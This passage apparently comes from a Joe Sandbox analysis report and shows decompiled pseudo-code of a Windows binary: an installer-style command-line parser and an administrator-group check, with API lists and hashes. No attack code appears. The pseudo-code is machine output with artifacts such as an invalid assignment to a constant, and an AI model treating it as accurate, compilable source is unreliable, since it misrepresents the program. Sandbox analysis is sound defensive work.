                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E00A36CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E00A36E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0xa38004; // 0xb6b6972c
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E00A3597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E00A344B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0xa39124 = E00A36285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E00A36CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E00A344B9(0, 0x521, 0xa31140, 0, 0x40, 0);
                                                                        												_t85 =  *0xa38588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E00A3667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E00A3667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E00A35C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E00A31680(0xa38c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E00A3667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E00A3667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0xa38a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E00A35C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0xa38b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0xa38a3a;
                                                                        																}
                                                                        																E00A31680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E00A3658A(_t218, 0x104, 0xa31140);
                                                                        																if(E00A331E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0xa38a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0xa38a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0xa38a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0xa38a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0xa38a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0xa39a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0xa39a2c =  *0xa39a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0xa38d48 =  *0xa38d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0xa39a2c =  *0xa39a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0xa39a2c =  *0xa39a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0xa38d48 =  *0xa38d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0xa39a2c =  *0xa39a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0xa38a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0xa39a2c = 3;
                                                                        																	 *0xa38a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0xa38a2c != 0 &&  *0xa38b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0xa39a3c, 0xa38b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E00A366C8(0xa38b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}


































































                                                                        0x00a35c9e
                                                                        0x00a35ca9
                                                                        0x00a35cb0
                                                                        0x00a35cb3
                                                                        0x00a35cb6
                                                                        0x00a35cb7
                                                                        0x00a35cb8
                                                                        0x00a35cbd
                                                                        0x00a36204
                                                                        0x00a35ccb
                                                                        0x00000000
                                                                        0x00a35ccb
                                                                        0x00a35cd3
                                                                        0x00a35cd7
                                                                        0x00a35cf4
                                                                        0x00000000
                                                                        0x00a35cf4
                                                                        0x00a35cf8
                                                                        0x00a35d00
                                                                        0x00000000
                                                                        0x00a35d06
                                                                        0x00a35d06
                                                                        0x00a35d0e
                                                                        0x00a35d10
                                                                        0x00a35d12
                                                                        0x00a35d14
                                                                        0x00a35d15
                                                                        0x00a35d17
                                                                        0x00a35d49
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35d19
                                                                        0x00a35d19
                                                                        0x00a35d1d
                                                                        0x00000000
                                                                        0x00a35d3f
                                                                        0x00a35d3f
                                                                        0x00a35d4b
                                                                        0x00a35d4b
                                                                        0x00a35d4f
                                                                        0x00a35d8d
                                                                        0x00000000
                                                                        0x00a35d93
                                                                        0x00a35d93
                                                                        0x00a35d9a
                                                                        0x00a35d9d
                                                                        0x00a35d9e
                                                                        0x00000000
                                                                        0x00a35d9e
                                                                        0x00a35d51
                                                                        0x00a35d5b
                                                                        0x00a35d72
                                                                        0x00a360fb
                                                                        0x00a360fb
                                                                        0x00a36207
                                                                        0x00a3620a
                                                                        0x00a3620b
                                                                        0x00a3620e
                                                                        0x00a36217
                                                                        0x00a35d78
                                                                        0x00a35d78
                                                                        0x00a35d80
                                                                        0x00a35d83
                                                                        0x00a35d84
                                                                        0x00000000
                                                                        0x00a35d84
                                                                        0x00a35d5d
                                                                        0x00a35d5f
                                                                        0x00a35d62
                                                                        0x00a35d68
                                                                        0x00a35d64
                                                                        0x00a35d64
                                                                        0x00a35d64
                                                                        0x00000000
                                                                        0x00a35d62
                                                                        0x00a35d5b
                                                                        0x00a35d4f
                                                                        0x00a35d1d
                                                                        0x00000000
                                                                        0x00a35d9f
                                                                        0x00a35d9f
                                                                        0x00a35da5
                                                                        0x00a35dab
                                                                        0x00a35dba
                                                                        0x00a36218
                                                                        0x00a3621d
                                                                        0x00a36220
                                                                        0x00a36221
                                                                        0x00a36229
                                                                        0x00a36230
                                                                        0x00a36247
                                                                        0x00a3626a
                                                                        0x00a36272
                                                                        0x00a36249
                                                                        0x00a36255
                                                                        0x00a3625f
                                                                        0x00a36264
                                                                        0x00a36264
                                                                        0x00a36284
                                                                        0x00a35dc0
                                                                        0x00a35dc0
                                                                        0x00a35dca
                                                                        0x00a35e22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35dcc
                                                                        0x00a35dce
                                                                        0x00a35e24
                                                                        0x00a35e24
                                                                        0x00a35e2c
                                                                        0x00a35e47
                                                                        0x00a35e4a
                                                                        0x00a361d2
                                                                        0x00a361e2
                                                                        0x00a361e7
                                                                        0x00a361ee
                                                                        0x00a361f1
                                                                        0x00a361f1
                                                                        0x00a361f8
                                                                        0x00a361f8
                                                                        0x00a35e50
                                                                        0x00a35e53
                                                                        0x00a36109
                                                                        0x00a3611f
                                                                        0x00000000
                                                                        0x00a36125
                                                                        0x00a36137
                                                                        0x00a3613a
                                                                        0x00a3613c
                                                                        0x00a3613e
                                                                        0x00a3613e
                                                                        0x00a36141
                                                                        0x00a36141
                                                                        0x00a36143
                                                                        0x00a36144
                                                                        0x00a3614a
                                                                        0x00000000
                                                                        0x00a36150
                                                                        0x00a36152
                                                                        0x00a3615c
                                                                        0x00a36170
                                                                        0x00a36172
                                                                        0x00a3617c
                                                                        0x00a36190
                                                                        0x00a36190
                                                                        0x00a36196
                                                                        0x00a361a5
                                                                        0x00000000
                                                                        0x00a361ab
                                                                        0x00a361b9
                                                                        0x00a361c6
                                                                        0x00a361c6
                                                                        0x00a3617e
                                                                        0x00a36180
                                                                        0x00a3618a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3618a
                                                                        0x00a3615e
                                                                        0x00a36160
                                                                        0x00a3616a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3616a
                                                                        0x00a3615c
                                                                        0x00a3614a
                                                                        0x00a3610b
                                                                        0x00a3610e
                                                                        0x00a3610e
                                                                        0x00000000
                                                                        0x00a35e59
                                                                        0x00a35e59
                                                                        0x00a35e5c
                                                                        0x00a3604f
                                                                        0x00a36056
                                                                        0x00000000
                                                                        0x00a3605c
                                                                        0x00a3606e
                                                                        0x00a36071
                                                                        0x00a36073
                                                                        0x00a36075
                                                                        0x00a36075
                                                                        0x00a36078
                                                                        0x00a36078
                                                                        0x00a3607a
                                                                        0x00a3607b
                                                                        0x00a36081
                                                                        0x00000000
                                                                        0x00a36087
                                                                        0x00a36087
                                                                        0x00a3608d
                                                                        0x00a3609c
                                                                        0x00000000
                                                                        0x00a360a2
                                                                        0x00a360aa
                                                                        0x00a360b2
                                                                        0x00a360b7
                                                                        0x00a360bd
                                                                        0x00a360bf
                                                                        0x00a360bf
                                                                        0x00a360d6
                                                                        0x00a360e0
                                                                        0x00a360e7
                                                                        0x00a360f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a360f5
                                                                        0x00a3609c
                                                                        0x00a36081
                                                                        0x00a35e62
                                                                        0x00a35e62
                                                                        0x00a35e65
                                                                        0x00a35fd3
                                                                        0x00a35fe9
                                                                        0x00000000
                                                                        0x00a35fef
                                                                        0x00a35fef
                                                                        0x00a35ff7
                                                                        0x00a35ffd
                                                                        0x00a36003
                                                                        0x00a36006
                                                                        0x00a36011
                                                                        0x00a36014
                                                                        0x00a3603d
                                                                        0x00a36016
                                                                        0x00a36018
                                                                        0x00a36019
                                                                        0x00a3601b
                                                                        0x00a36033
                                                                        0x00a3601d
                                                                        0x00a36020
                                                                        0x00a36029
                                                                        0x00a36022
                                                                        0x00a36022
                                                                        0x00a36022
                                                                        0x00a36020
                                                                        0x00a3601b
                                                                        0x00a36042
                                                                        0x00a36044
                                                                        0x00a36046
                                                                        0x00a3604a
                                                                        0x00a35ff7
                                                                        0x00a35fd5
                                                                        0x00a35fd8
                                                                        0x00a35fd8
                                                                        0x00000000
                                                                        0x00a35e6b
                                                                        0x00a35e6b
                                                                        0x00a35e6e
                                                                        0x00a35f8b
                                                                        0x00a35f99
                                                                        0x00000000
                                                                        0x00a35f9f
                                                                        0x00a35fa7
                                                                        0x00a35faf
                                                                        0x00000000
                                                                        0x00a35fb1
                                                                        0x00a35fb3
                                                                        0x00000000
                                                                        0x00a35fb5
                                                                        0x00a35fb7
                                                                        0x00000000
                                                                        0x00a35fb9
                                                                        0x00000000
                                                                        0x00a35fb9
                                                                        0x00a35fb7
                                                                        0x00a35fb3
                                                                        0x00a35faf
                                                                        0x00a35f8d
                                                                        0x00a35f8d
                                                                        0x00a35f8d
                                                                        0x00a35f8f
                                                                        0x00a35fc1
                                                                        0x00a35fc1
                                                                        0x00a35fc1
                                                                        0x00000000
                                                                        0x00a35e74
                                                                        0x00a35e74
                                                                        0x00a35e77
                                                                        0x00a35ea0
                                                                        0x00a35ebd
                                                                        0x00a35f79
                                                                        0x00000000
                                                                        0x00a35f7f
                                                                        0x00a35ec3
                                                                        0x00a35ec3
                                                                        0x00a35ecc
                                                                        0x00a35ed4
                                                                        0x00a35ed6
                                                                        0x00a35edc
                                                                        0x00a35edf
                                                                        0x00a35eea
                                                                        0x00a35eed
                                                                        0x00a35f3f
                                                                        0x00a35f40
                                                                        0x00000000
                                                                        0x00a35eef
                                                                        0x00a35eef
                                                                        0x00a35ef2
                                                                        0x00a35f34
                                                                        0x00a35ef4
                                                                        0x00a35ef4
                                                                        0x00a35ef7
                                                                        0x00a35f2b
                                                                        0x00000000
                                                                        0x00a35ef9
                                                                        0x00a35ef9
                                                                        0x00a35efc
                                                                        0x00a35f22
                                                                        0x00000000
                                                                        0x00a35efe
                                                                        0x00a35eff
                                                                        0x00a35f02
                                                                        0x00a35f16
                                                                        0x00a35f04
                                                                        0x00a35f07
                                                                        0x00a35f0d
                                                                        0x00a35f46
                                                                        0x00a35f46
                                                                        0x00a35f09
                                                                        0x00a35f09
                                                                        0x00a35f09
                                                                        0x00a35f07
                                                                        0x00a35f02
                                                                        0x00a35efc
                                                                        0x00a35ef7
                                                                        0x00a35ef2
                                                                        0x00a35f4c
                                                                        0x00a35f4e
                                                                        0x00a35f50
                                                                        0x00a35f54
                                                                        0x00a35ed4
                                                                        0x00a35ea2
                                                                        0x00a35ea4
                                                                        0x00a35eaf
                                                                        0x00a35eaf
                                                                        0x00000000
                                                                        0x00a35e79
                                                                        0x00a35e7d
                                                                        0x00000000
                                                                        0x00a35e83
                                                                        0x00a35e83
                                                                        0x00a35e83
                                                                        0x00a35e85
                                                                        0x00a35e85
                                                                        0x00a35e8e
                                                                        0x00000000
                                                                        0x00a35e94
                                                                        0x00000000
                                                                        0x00a35e94
                                                                        0x00a35e8e
                                                                        0x00a35e7d
                                                                        0x00a35e77
                                                                        0x00a35e6e
                                                                        0x00a35e65
                                                                        0x00a35e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35dd0
                                                                        0x00a35dd0
                                                                        0x00a35dd0
                                                                        0x00000000
                                                                        0x00a35dd0
                                                                        0x00a35dce
                                                                        0x00a35dca
                                                                        0x00a35dba
                                                                        0x00000000
                                                                        0x00a35d00
                                                                        0x00a35dd9
                                                                        0x00a35e04
                                                                        0x00a361fe
                                                                        0x00a35e0a
                                                                        0x00a35e0c
                                                                        0x00a35e17
                                                                        0x00a35e17
                                                                        0x00a35e04
                                                                        0x00a36200
                                                                        0x00a36200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00A35CEE
                                                                        • GetModuleFileNameA.KERNEL32(00A38B3E,00000104,00000000,?,?), ref: 00A35DFC
                                                                        • CharUpperA.USER32(?), ref: 00A35E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 00A35EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A35F6F
                                                                        • CharUpperA.USER32(?), ref: 00A35FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 00A36008
                                                                        • CharUpperA.USER32(?), ref: 00A360AA
                                                                        • CloseHandle.KERNEL32(00000000,00A31140,00000000,00000040,00000000), ref: 00A361F1
                                                                        • ExitProcess.KERNEL32 ref: 00A361F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: 498f963dba783da8b96269a1771e93afe38932f5814089f884182febcb72683d
                                                                        • Instruction ID: 983a309d904afcb6f26e9449b5ccf04c1f08ea913405734821a6b316832ef085
                                                                        • Opcode Fuzzy Hash: 498f963dba783da8b96269a1771e93afe38932f5814089f884182febcb72683d
                                                                        • Instruction Fuzzy Hash: D3D14A71E04B546ADF39CB7C9C497FA77B1AB16344F2481AAF4D6C6190DAB48E838F40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00A318A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0xa38128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E00A36CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E00A317EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0xa38128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0xa38128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        0x00a318a3
                                                                        0x00a318a3
                                                                        0x00a318ab
                                                                        0x00a318b2
                                                                        0x00a318b5
                                                                        0x00a318be
                                                                        0x00a318c0
                                                                        0x00a318c6
                                                                        0x00a318c7
                                                                        0x00a318ca
                                                                        0x00a318cf
                                                                        0x00a319c9
                                                                        0x00a319d8
                                                                        0x00a319d8
                                                                        0x00a318df
                                                                        0x00a319b8
                                                                        0x00a319bd
                                                                        0x00a319bf
                                                                        0x00a319bf
                                                                        0x00000000
                                                                        0x00a319bd
                                                                        0x00a318fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a31912
                                                                        0x00a319aa
                                                                        0x00a319ad
                                                                        0x00a319b3
                                                                        0x00000000
                                                                        0x00a31927
                                                                        0x00a31927
                                                                        0x00a31932
                                                                        0x00a31936
                                                                        0x00a319a9
                                                                        0x00a319a9
                                                                        0x00000000
                                                                        0x00a319a9
                                                                        0x00a3194c
                                                                        0x00a319a2
                                                                        0x00a319a3
                                                                        0x00000000
                                                                        0x00a3196e
                                                                        0x00a31970
                                                                        0x00a31999
                                                                        0x00a3199c
                                                                        0x00000000
                                                                        0x00a3199c
                                                                        0x00a31972
                                                                        0x00a31972
                                                                        0x00a31975
                                                                        0x00a31984
                                                                        0x00a31985
                                                                        0x00a3198a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3198c
                                                                        0x00a31991
                                                                        0x00a31996
                                                                        0x00000000
                                                                        0x00a31996
                                                                        0x00a3194c

                                                                        APIs
